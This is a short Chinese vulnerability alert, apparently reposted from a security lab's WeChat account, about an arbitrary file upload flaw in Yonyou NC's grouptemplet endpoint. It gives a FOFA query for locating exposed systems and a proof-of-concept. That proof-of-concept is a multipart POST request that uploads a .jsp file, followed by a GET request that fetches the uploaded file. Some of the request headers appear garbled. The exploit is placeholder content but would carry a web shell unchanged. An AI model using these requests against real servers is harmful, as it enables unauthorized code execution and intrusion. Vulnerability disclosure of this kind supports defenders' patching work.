0x02 漏洞描述
用友 NC grouptemplet 存在文件上传漏洞。
0x03 漏洞复现
fofa-qeury: title="YONYOU NC"
1.执行poc进行文件上传,访问得到结果
|
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
Host:
multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ :
Mozilla/5.0 :
------WebKitFormBoundaryEXmnamw5gVZG9KAQ
form-data; name="file"; filename="test.jsp" :
application/octet-stream :
111111111111111111111
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
|
GET /uapim/static/pages/nc/{{filename}} HTTP/1.1
Host:
Mozilla/5.0 :
原文始发于微信公众号(融云攻防实验室):漏洞预警 用友 NC grouptemplet 文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论